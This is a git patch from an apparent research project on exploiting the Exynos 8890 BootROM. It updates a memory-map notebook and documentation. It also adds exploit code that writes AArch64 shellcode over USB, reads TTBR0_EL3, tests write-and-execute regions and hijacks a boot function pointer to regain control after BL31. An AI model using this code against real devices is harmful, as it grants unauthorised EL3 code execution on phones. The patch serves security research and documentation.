From e59478187dabab194d236703db3abdb837403209 Mon Sep 17 00:00:00 2001 From: Jonathan Herrewijnen Date: Thu, 29 Aug 2024 21:06:15 +0200 Subject: [PATCH] Loads and executes BL31, then returns debugger, then continues bootflow and enters recovery --- .../source/BootROM_8890/boot_chain.rst | 10 +- documentation/source/_ignore/draw_boot.ipynb | 850 ++++++++++++------ .../source/_ignore/stack_and_functions.csv | 6 +- .../source/_static/stack_and_functions.html | 14 + dump/reloc_debugger.bin | Bin 2608 -> 2612 bytes source/exploit/exploit.py | 67 +- 6 files changed, 658 insertions(+), 289 deletions(-) create mode 100644 documentation/source/_static/stack_and_functions.html diff --git a/documentation/source/BootROM_8890/boot_chain.rst b/documentation/source/BootROM_8890/boot_chain.rst index 5920ab3..3ea0d8f 100644 --- a/documentation/source/BootROM_8890/boot_chain.rst +++ b/documentation/source/BootROM_8890/boot_chain.rst @@ -4,9 +4,13 @@ Booting ======= This part describes the boot chain of the ``Exynos 8890`` SoC. -Booting Protocol -================ -TODO document normal samsung boot chain +Memory overview +=============== + +.. raw:: html + + + Exploitation ============ diff --git a/documentation/source/_ignore/draw_boot.ipynb b/documentation/source/_ignore/draw_boot.ipynb index eee3ddf..6049c1d 100644 --- a/documentation/source/_ignore/draw_boot.ipynb +++ b/documentation/source/_ignore/draw_boot.ipynb @@ -2,7 +2,7 @@ "cells": [ { "cell_type": "code", - "execution_count": 1, + "execution_count": 17, "metadata": {}, "outputs": [], "source": [ @@ -20,7 +20,7 @@ }, { "cell_type": "code", - "execution_count": 2, + "execution_count": 18, "metadata": {}, "outputs": [ { @@ -158,11 +158,24 @@ " NaN\n", " NaN\n", " 147456\n", - " False\n", + " True\n", " 7.0\n", " \n", " \n", " 8\n", + " 33773056\n", + " 33773064\n", + " TTBR0_EL3 address ptr\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 8\n", + " True\n", + " 7.0\n", + " \n", + " \n", + " 9\n", " 33849344\n", " 34008336\n", " BL2\n", @@ -172,10 +185,36 @@ " NaN\n", " 158992\n", " True\n", - " 8.0\n", + " 9.0\n", " \n", " \n", - " 9\n", + " 10\n", + " 33849344\n", + " 33872624\n", + " BL2 empty space?\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 23280\n", + " True\n", + " 9.0\n", + " \n", + " \n", + " 11\n", + " 33876736\n", + " 33876736\n", + " BL2 copy start/source\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 0\n", + " True\n", + " 9.0\n", + " \n", + " \n", + " 12\n", " 33984512\n", " 34009088\n", " Debugger\n", @@ -185,10 +224,10 @@ " NaN\n", " 24576\n", " True\n", - " 8.0\n", + " 9.0\n", " \n", " \n", - " 10\n", + " 13\n", " 34008336\n", " 34013184\n", " End/Start peripheral space?\n", @@ -198,10 +237,10 @@ " NaN\n", " 4848\n", " True\n", - " 9.0\n", + " 12.0\n", " \n", " \n", - " 11\n", + " 14\n", " 34340864\n", " 34369536\n", " Debugger relocated\n", @@ -211,10 +250,10 @@ " NaN\n", " 28672\n", " True\n", - " 11.0\n", + " 16.0\n", " \n", " \n", - " 12\n", + " 15\n", " 34340864\n", " 34340868\n", " _frederic_dest_ptr\n", @@ -224,10 +263,23 @@ " NaN\n", " 4\n", " True\n", - " 11.0\n", + " 14.0\n", " \n", " \n", - " 13\n", + " 16\n", + " 34349056\n", + " 34508048\n", + " BL2 load address?\n", + " NaN\n", + " NaN\n", + " NaN\n", + " NaN\n", + " 158992\n", + " True\n", + " 16.0\n", + " \n", + " \n", + " 17\n", " 34371584\n", " 34373632\n", " modem_interface\n", @@ -236,11 +288,11 @@ " NaN\n", " NaN\n", " 2048\n", - " False\n", - " 13.0\n", + " True\n", + " 16.0\n", " \n", " \n", - " 14\n", + " 18\n", " 346816512\n", " 346836992\n", " mali@14AC0000\n", @@ -250,7 +302,7 @@ " NaN\n", " 20480\n", " False\n", - " 14.0\n", + " 18.0\n", " \n", " \n", "\n", @@ -266,13 +318,17 @@ "5 33689440 33689448 _boot_usb_ra NaN NaN NaN NaN \n", "6 33693696 33701888 BL1 NaN NaN NaN NaN \n", "7 33701888 33849344 BL31 NaN NaN NaN NaN \n", - "8 33849344 34008336 BL2 NaN NaN NaN NaN \n", - "9 33984512 34009088 Debugger NaN NaN NaN NaN \n", - "10 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n", - "11 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n", - "12 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n", - "13 34371584 34373632 modem_interface NaN NaN NaN NaN \n", - "14 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n", + "8 33773056 33773064 TTBR0_EL3 address ptr NaN NaN NaN NaN \n", + "9 33849344 34008336 BL2 NaN NaN NaN NaN \n", + "10 33849344 33872624 BL2 empty space? NaN NaN NaN NaN \n", + "11 33876736 33876736 BL2 copy start/source NaN NaN NaN NaN \n", + "12 33984512 34009088 Debugger NaN NaN NaN NaN \n", + "13 34008336 34013184 End/Start peripheral space? NaN NaN NaN NaN \n", + "14 34340864 34369536 Debugger relocated NaN NaN NaN NaN \n", + "15 34340864 34340868 _frederic_dest_ptr NaN NaN NaN NaN \n", + "16 34349056 34508048 BL2 load address? NaN NaN NaN NaN \n", + "17 34371584 34373632 modem_interface NaN NaN NaN NaN \n", + "18 346816512 346836992 mali@14AC0000 NaN NaN NaN NaN \n", "\n", " size overlap overlap_with \n", "0 131072 True 0.0 \n", @@ -282,17 +338,21 @@ "4 28672 False 4.0 \n", "5 8 False 5.0 \n", "6 8192 False 6.0 \n", - "7 147456 False 7.0 \n", - "8 158992 True 8.0 \n", - "9 24576 True 8.0 \n", - "10 4848 True 9.0 \n", - "11 28672 True 11.0 \n", - "12 4 True 11.0 \n", - "13 2048 False 13.0 \n", - "14 20480 False 14.0 " + "7 147456 True 7.0 \n", + "8 8 True 7.0 \n", + "9 158992 True 9.0 \n", + "10 23280 True 9.0 \n", + "11 0 True 9.0 \n", + "12 24576 True 9.0 \n", + "13 4848 True 12.0 \n", + "14 28672 True 16.0 \n", + "15 4 True 14.0 \n", + "16 158992 True 16.0 \n", + "17 2048 True 16.0 \n", + "18 20480 False 18.0 " ] }, - "execution_count": 2, + "execution_count": 18, "metadata": {}, "output_type": "execute_result" } @@ -352,7 +412,7 @@ }, { "cell_type": "code", - "execution_count": 3, + "execution_count": 19, "metadata": {}, "outputs": [ { @@ -364,7 +424,7 @@ "data": [ { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "name": "BootROM", @@ -380,7 +440,7 @@ }, { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "showlegend": false, @@ -396,7 +456,7 @@ }, { "marker": { - "color": "#46d3f4" + "color": "#0b977d" }, "mode": "text", "showlegend": false, @@ -412,7 +472,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "name": "_jump_bl1", @@ -428,7 +488,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "showlegend": false, @@ -444,7 +504,7 @@ }, { "marker": { - "color": "#05f11d" + "color": "#4c1830" }, "mode": "text", "showlegend": false, @@ -460,7 +520,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "name": "_boot_usb", @@ -476,7 +536,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "showlegend": false, @@ -492,7 +552,7 @@ }, { "marker": { - "color": "#15ef8e" + "color": "#5d2e02" }, "mode": "text", "showlegend": false, @@ -508,7 +568,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "name": "auth_bl1", @@ -524,7 +584,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "showlegend": false, @@ -540,7 +600,7 @@ }, { "marker": { - "color": "#d1cb9b" + "color": "#5e6e3f" }, "mode": "text", "showlegend": false, @@ -556,7 +616,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "name": "Tried debugger space", @@ -572,7 +632,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "showlegend": false, @@ -588,7 +648,7 @@ }, { "marker": { - "color": "#bafebb" + "color": "#85ca4e" }, "mode": "text", "showlegend": false, @@ -604,7 +664,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "name": "_boot_usb_ra", @@ -620,7 +680,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "showlegend": false, @@ -636,7 +696,7 @@ }, { "marker": { - "color": "#b21068" + "color": "#d2f956" }, "mode": "text", "showlegend": false, @@ -652,7 +712,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "name": "BL1", @@ -668,7 +728,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "showlegend": false, @@ -684,7 +744,7 @@ }, { "marker": { - "color": "#d43e00" + "color": "#55fe0e" }, "mode": "text", "showlegend": false, @@ -700,7 +760,7 @@ }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "name": "BL31", @@ -716,7 +776,7 @@ }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "showlegend": false, @@ -724,15 +784,15 @@ "textposition": "middle center", "type": "scatter", "x": [ - 1.2400000000000002 + 1.1400000000000001 ], "y": [ - 7.84 + 8.84 ] }, { "marker": { - "color": "#2fcf29" + "color": "#b0d635" }, "mode": "text", "showlegend": false, @@ -740,7 +800,7 @@ "textposition": "middle center", "type": "scatter", "x": [ - 1.2400000000000002 + 1.1400000000000001 ], "y": [ 7.14 @@ -748,7 +808,55 @@ }, { "marker": { - "color": "#7ac7dc" + "color": "#beec90" + }, + "mode": "text", + "name": "TTBR0_EL3 address ptr", + "text": "TTBR0_EL3 address ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 8.52 + ] + }, + { + "marker": { + "color": "#beec90" + }, + "mode": "text", + "showlegend": false, + "text": "0x2035608", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.709999999999999 + ] + }, + { + "marker": { + "color": "#beec90" + }, + "mode": "text", + "showlegend": false, + "text": "0x2035600", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.16 + ] + }, + { + "marker": { + "color": "#65a13c" }, "mode": "text", "name": "BL2", @@ -759,12 +867,12 @@ 2.5 ], "y": [ - 8.5 + 9.5 ] }, { "marker": { - "color": "#7ac7dc" + "color": "#65a13c" }, "mode": "text", "showlegend": false, @@ -774,177 +882,129 @@ "x": [ 1.1400000000000001 ], - "y": [ - 9.34 - ] - }, - { - "marker": { - "color": "#7ac7dc" - }, - "mode": "text", - "showlegend": false, - "text": "0x2048000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.1400000000000001 - ], - "y": [ - 8.14 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "name": "Debugger", - "text": "Debugger", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 9.52 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "showlegend": false, - "text": "0x206f000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 9.709999999999999 - ] - }, - { - "marker": { - "color": "#1a256d" - }, - "mode": "text", - "showlegend": false, - "text": "0x2069000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 9.16 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "name": "End/Start peripheral space?", - "text": "End/Start peripheral space?", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 10.52 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "showlegend": false, - "text": "0x2070000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 10.709999999999999 - ] - }, - { - "marker": { - "color": "#b0eb7f" - }, - "mode": "text", - "showlegend": false, - "text": "0x206ed10", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.2400000000000002 - ], - "y": [ - 10.16 - ] - }, - { - "marker": { - "color": "#e42eab" - }, - "mode": "text", - "name": "Debugger relocated", - "text": "Debugger relocated", - "textposition": "middle center", - "type": "scatter", - "x": [ - 2.5 - ], - "y": [ - 11.5 - ] - }, - { - "marker": { - "color": "#e42eab" - }, - "mode": "text", - "showlegend": false, - "text": "0x20c7000", - "textposition": "middle center", - "type": "scatter", - "x": [ - 1.1400000000000001 - ], "y": [ 12.84 ] }, { "marker": { - "color": "#e42eab" + "color": "#65a13c" }, "mode": "text", "showlegend": false, - "text": "0x20c0000", + "text": "0x2048000", "textposition": "middle center", "type": "scatter", "x": [ 1.1400000000000001 ], "y": [ - 11.14 + 9.14 ] }, { "marker": { - "color": "#b86b0c" + "color": "#177b8d" }, "mode": "text", - "name": "_frederic_dest_ptr", - "text": "_frederic_dest_ptr", + "name": "BL2 empty space?", + "text": "BL2 empty space?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 10.52 + ] + }, + { + "marker": { + "color": "#177b8d" + }, + "mode": "text", + "showlegend": false, + "text": "0x204daf0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 10.709999999999999 + ] + }, + { + "marker": { + "color": "#177b8d" + }, + "mode": "text", + "showlegend": false, + "text": "0x2048000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 10.16 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "name": "BL2 copy start/source", + "text": "BL2 copy start/source", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 11.52 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "showlegend": false, + "text": "0x204eb00", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.709999999999999 + ] + }, + { + "marker": { + "color": "#9e7028" + }, + "mode": "text", + "showlegend": false, + "text": "0x204eb00", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.16 + ] + }, + { + "marker": { + "color": "#7df722" + }, + "mode": "text", + "name": "Debugger", + "text": "Debugger", "textposition": "middle center", "type": "scatter", "x": [ @@ -956,11 +1016,11 @@ }, { "marker": { - "color": "#b86b0c" + "color": "#7df722" }, "mode": "text", "showlegend": false, - "text": "0x20c0004", + "text": "0x206f000", "textposition": "middle center", "type": "scatter", "x": [ @@ -972,11 +1032,11 @@ }, { "marker": { - "color": "#b86b0c" + "color": "#7df722" }, "mode": "text", "showlegend": false, - "text": "0x20c0000", + "text": "0x2069000", "textposition": "middle center", "type": "scatter", "x": [ @@ -988,7 +1048,199 @@ }, { "marker": { - "color": "#625596" + "color": "#c9c022" + }, + "mode": "text", + "name": "End/Start peripheral space?", + "text": "End/Start peripheral space?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 13.52 + ] + }, + { + "marker": { + "color": "#c9c022" + }, + "mode": "text", + "showlegend": false, + "text": "0x2070000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 13.709999999999999 + ] + }, + { + "marker": { + "color": "#c9c022" + }, + "mode": "text", + "showlegend": false, + "text": "0x206ed10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 13.16 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "name": "Debugger relocated", + "text": "Debugger relocated", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 14.52 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c7000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 14.709999999999999 + ] + }, + { + "marker": { + "color": "#db6aa0" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 14.16 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "name": "_frederic_dest_ptr", + "text": "_frederic_dest_ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 15.52 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0004", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 15.709999999999999 + ] + }, + { + "marker": { + "color": "#678572" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 15.16 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "name": "BL2 load address?", + "text": "BL2 load address?", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 16.5 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "showlegend": false, + "text": "0x20e8d10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 18.84 + ] + }, + { + "marker": { + "color": "#ac9800" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c2000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 16.14 + ] + }, + { + "marker": { + "color": "#32af54" }, "mode": "text", "name": "modem_interface", @@ -999,12 +1251,12 @@ 2.5 ], "y": [ - 13.5 + 17.52 ] }, { "marker": { - "color": "#625596" + "color": "#32af54" }, "mode": "text", "showlegend": false, @@ -1015,12 +1267,12 @@ 1.2400000000000002 ], "y": [ - 13.84 + 17.71 ] }, { "marker": { - "color": "#625596" + "color": "#32af54" }, "mode": "text", "showlegend": false, @@ -1031,12 +1283,12 @@ 1.2400000000000002 ], "y": [ - 13.14 + 17.16 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "name": "mali@14AC0000", @@ -1047,12 +1299,12 @@ 2.5 ], "y": [ - 14.5 + 18.5 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "showlegend": false, @@ -1063,12 +1315,12 @@ 1.2400000000000002 ], "y": [ - 14.84 + 18.84 ] }, { "marker": { - "color": "#5b6129" + "color": "#34b9f5" }, "mode": "text", "showlegend": false, @@ -1079,7 +1331,7 @@ 1.2400000000000002 ], "y": [ - 14.14 + 18.14 ] } ], @@ -1102,7 +1354,7 @@ }, "shapes": [ { - "fillcolor": "#46d3f4", + "fillcolor": "#0b977d", "layer": "below", "line": { "width": 2 @@ -1115,7 +1367,7 @@ "y1": 3.92 }, { - "fillcolor": "#05f11d", + "fillcolor": "#4c1830", "layer": "below", "line": { "width": 2 @@ -1128,7 +1380,7 @@ "y1": 1.79 }, { - "fillcolor": "#15ef8e", + "fillcolor": "#5d2e02", "layer": "below", "line": { "width": 2 @@ -1141,7 +1393,7 @@ "y1": 2.79 }, { - "fillcolor": "#d1cb9b", + "fillcolor": "#5e6e3f", "layer": "below", "line": { "width": 2 @@ -1154,7 +1406,7 @@ "y1": 3.79 }, { - "fillcolor": "#bafebb", + "fillcolor": "#85ca4e", "layer": "below", "line": { "width": 2 @@ -1167,7 +1419,7 @@ "y1": 4.92 }, { - "fillcolor": "#b21068", + "fillcolor": "#d2f956", "layer": "below", "line": { "width": 2 @@ -1180,7 +1432,7 @@ "y1": 5.92 }, { - "fillcolor": "#d43e00", + "fillcolor": "#55fe0e", "layer": "below", "line": { "width": 2 @@ -1193,20 +1445,7 @@ "y1": 6.92 }, { - "fillcolor": "#2fcf29", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 4, - "y0": 7.08, - "y1": 7.92 - }, - { - "fillcolor": "#7ac7dc", + "fillcolor": "#b0d635", "layer": "below", "line": { "width": 2 @@ -1215,11 +1454,11 @@ "type": "rect", "x0": 0.9, "x1": 4.1, - "y0": 8.08, - "y1": 9.42 + "y0": 7.08, + "y1": 8.92 }, { - "fillcolor": "#1a256d", + "fillcolor": "#beec90", "layer": "below", "line": { "width": 2 @@ -1228,11 +1467,24 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 9.1, - "y1": 9.79 + "y0": 8.1, + "y1": 8.79 }, { - "fillcolor": "#b0eb7f", + "fillcolor": "#65a13c", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 9.08, + "y1": 12.92 + }, + { + "fillcolor": "#177b8d", "layer": "below", "line": { "width": 2 @@ -1245,20 +1497,20 @@ "y1": 10.79 }, { - "fillcolor": "#e42eab", + "fillcolor": "#9e7028", "layer": "below", "line": { "width": 2 }, "opacity": 0.5, "type": "rect", - "x0": 0.9, - "x1": 4.1, - "y0": 11.08, - "y1": 12.92 + "x0": 1, + "x1": 4, + "y0": 11.1, + "y1": 11.79 }, { - "fillcolor": "#b86b0c", + "fillcolor": "#7df722", "layer": "below", "line": { "width": 2 @@ -1271,7 +1523,7 @@ "y1": 12.79 }, { - "fillcolor": "#625596", + "fillcolor": "#c9c022", "layer": "below", "line": { "width": 2 @@ -1280,11 +1532,11 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 13.08, - "y1": 13.92 + "y0": 13.1, + "y1": 13.79 }, { - "fillcolor": "#5b6129", + "fillcolor": "#db6aa0", "layer": "below", "line": { "width": 2 @@ -1293,8 +1545,60 @@ "type": "rect", "x0": 1, "x1": 4, - "y0": 14.08, - "y1": 14.92 + "y0": 14.1, + "y1": 14.79 + }, + { + "fillcolor": "#678572", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 15.1, + "y1": 15.79 + }, + { + "fillcolor": "#ac9800", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 16.08, + "y1": 18.92 + }, + { + "fillcolor": "#32af54", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 17.099999999999998, + "y1": 17.790000000000003 + }, + { + "fillcolor": "#34b9f5", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 18.08, + "y1": 18.92 } ], "template": { @@ -2152,7 +2456,11 @@ 11, 12, 13, - 14 + 14, + 15, + 16, + 17, + 18 ] } } @@ -2316,7 +2624,7 @@ }, { "cell_type": "code", - "execution_count": 4, + "execution_count": 20, "metadata": {}, "outputs": [], "source": [ diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv index e08664f..965aafe 100644 --- a/documentation/source/_ignore/stack_and_functions.csv +++ b/documentation/source/_ignore/stack_and_functions.csv @@ -10,7 +10,11 @@ start,end,name,order,comment,X0,LR 0x02048000,0x0206ed10,BL2,,,, 0x02069000,0x0206f000,Debugger,,,, 0x020c0000,0x020c7000,Debugger relocated,,,, +0x02048000,0x0204daf0,BL2 empty space?,,,, +0x0204eb00,0x0204eb00,BL2 copy start/source,,,, +0x020c2000,0x020e8d10,BL2 load address?,,,, 0x0206ed10,0x02070000,End/Start peripheral space?,,,, 0x02019e5c,0x02020e5c,Tried debugger space,,,, 0x020C7800,0x020C8000,modem_interface,,,, -0x14AC0000,0x14ac5000,mali@14AC0000,,,, \ No newline at end of file +0x14AC0000,0x14ac5000,mali@14AC0000,,,, +0x2035600,0x2035608,TTBR0_EL3 address ptr,,,, \ No newline at end of file diff --git a/documentation/source/_static/stack_and_functions.html b/documentation/source/_static/stack_and_functions.html new file mode 100644 index 0000000..5d0abee --- /dev/null +++ b/documentation/source/_static/stack_and_functions.html @@ -0,0 +1,14 @@ + + + +
+
+ + \ No newline at end of file diff --git a/dump/reloc_debugger.bin b/dump/reloc_debugger.bin index 6644fb07a87722f72861d6767530da8a29c9915a..aa710721f70adec8d5c34cba8c7263d07bdbaaa7 100755 GIT binary patch delta 331 zcmdlWvPERV9L9wk=Y}(Ju4iBn+4TSa^tF@!GR>@*)Nx+W-)hE{f1Md7er9IW zy5g{)Xt`|dbYn&a6E22%K^!#>lV36mYn=j$bBj7yXtFYV^cH2XSor^chz3JLPzMvs zWNsFzc!haEj0_ADJ~K0{x(ZaPsK7tb0Vw^5Sw!n^HPgz!%?uOwGcj16ld7E#67K|B z@sOE83#LXF$iD!@E0`QCKTP7DZN|9VZ+nuVRt5f!g*3 zX4?Xxi3(ubgi&l;2DA+%{t#%&BcLbPfi|p~%*eWhalzzmtmd3aViSwEiA}tAX!AGL pSB#9dn;){?L|!e?fNRa1f56&3g=Isl~~F^g#Zt!7&Jx0zw$ekKOX^HR0bLE>FN;~z3J zXu;Iz0r?jv=dwrwt(n}xqR0v~ufuWjIu>agsL5YoCQlHWr~o!u7{%n}K$Ah@4}ms5 z0y>xjXyWS0tgKrYCrsYOYR(xXHnDh_*u-m_HveLM#mH#4`6;_SBjeo3s+{{7T_!)} Vl;^bj_ka5TfB(f}Ci8Ns0{|KWZ65#t diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index af1a0be..d77566f 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -385,7 +385,7 @@ class ExynosDevice(): _setup_debugger() - def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000): + def relocate_debugger(self, debugger=None, entry=0x020c0000, storage=0x020c4000, g_data_received=0x020c6000, alternative_size=0x1000): """ Relocates the debugger to another location. Make sure to have built the debugger with the correct addresses! @@ -411,7 +411,7 @@ class ExynosDevice(): # self.usb_write(b"FLSH") # Flush cache self.cd.restore_stack_and_jump(entry) assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" - self.cd.relocate_debugger(g_data_received+0x1000, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000 + self.cd.relocate_debugger(g_data_received+alternative_size, entry, storage) #0x20c7000, 0x20c0000, 0x20c4000 def dumb_interact(self, dump_imems=False): @@ -553,7 +553,7 @@ class ExynosDevice(): shellcode = f""" ldr x0, debugger_addr blr x0 - debugger_addr: .quad 0x020c0000 + debugger_addr: .quad 0x02022000 """ shellcode = ks.asm(shellcode, as_bytes=True)[0] @@ -579,25 +579,49 @@ class ExynosDevice(): # self.cd.restore_stack_and_jump(0x000125b4) def get_ttbr0_el3(self): + """ + Get the TTBR0_EL3 register using opcode. + """ shellcode= f""" mov x1, lr mrs x0, ttbr0_el3 - ldr x2, =0x020c1000 + ldr x2, =0x206fd10 str x0, [x2] mov lr, x1 ret """ shellcode = ks.asm(shellcode, as_bytes=True)[0] - self.cd.memwrite_region(0x020c0000, shellcode) - self.cd.jump_to(0x020c0000) - ttbr0 = u64(self.cd.memdump_region(0x020c1000, 8)) + self.cd.memwrite_region(0x206ed10, shellcode) + self.cd.jump_to(0x0206ed10) + ttbr0 = u64(self.cd.memdump_region(0x0206fd10, 0x8)) print(f"TTBR0_EL3: {hex(ttbr0)}") print(f"Bits: {ttbr0:064b}") # Overwrite it with 0's - self.cd.memwrite_region(0x020c1000, b"\x00" * 8) - ttbr0 = self.cd.memdump_region(0x020c1000, 8) - assert ttbr0 == b"\x00" * 8, "TTBR0_EL3 not overwritten" + self.cd.memwrite_region(0x0206ed10, b"\x00" * 0x8) + ttbr0 = self.cd.memdump_region(0x206ed10, 0x8) + assert ttbr0 == b"\x00" * 0x8, "TTBR0_EL3 not overwritten" + + + def test_write_execute(self, address): + """ + At given address, test if it is possible to write and execute code, by writing a simple jump to, and jump back. + """ + + self.usb_write(b'PING') + assert self.usb_read(0x200) == b'PONG', "Debugger not alive before test" + + shellcode = f""" + mov x1, lr + ret + """ + + shellcode = ks.asm(shellcode, as_bytes=True)[0] + self.cd.memwrite_region(address, shellcode) + self.cd.jump_to(address) + self.usb_write(b"PING") + assert self.usb_read(0x200) == b"PONG", "Failed to jump back to debugger" + print(f'Jumped to {hex(address)} and back') def debugger_boot(self): @@ -611,13 +635,10 @@ class ExynosDevice(): logger.debug('State after setting up initial debugger') self.cd.arch_dbg.state.print_ctx() - # dumped = self.dump_memory(0x20000, 0x2070000) - DEBUGGER_ADDR = 0x2069000 # 0x2069000 - self.get_ttbr0_el3() # Relocate to other debugger - debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read() + debugger = open("../../dump/reloc_debugger_0x2048000.bin", "rb").read() self.relocate_debugger(debugger=debugger, entry=0x02048000, storage=0x02051000, g_data_received=0x02052000) DEBUGGER_ADDR = 0x02048000 @@ -707,6 +728,8 @@ class ExynosDevice(): self.cd.memwrite_region(0x20219b8, p32(DEBUGGER_ADDR)) # self.cd.restore_stack_and_jump(hijacked_fun) + # Write 'a1 00 00 00' to 0x0202a330 + self.cd.restore_stack_and_jump(0x02024010) time.sleep(2) @@ -715,6 +738,18 @@ class ExynosDevice(): self.usb_read(0x200) # GiAs self.cd.arch_dbg.fetch_special_regs() + BL31_ra = self.cd.arch_dbg.state.LR + + # Relocate debugger back to the start of the stack + # debugger = open("../../dump/reloc_debugger_0x2019e5c.bin", "rb").read() + # self.relocate_debugger(debugger=debugger, entry=0x14ac3000, 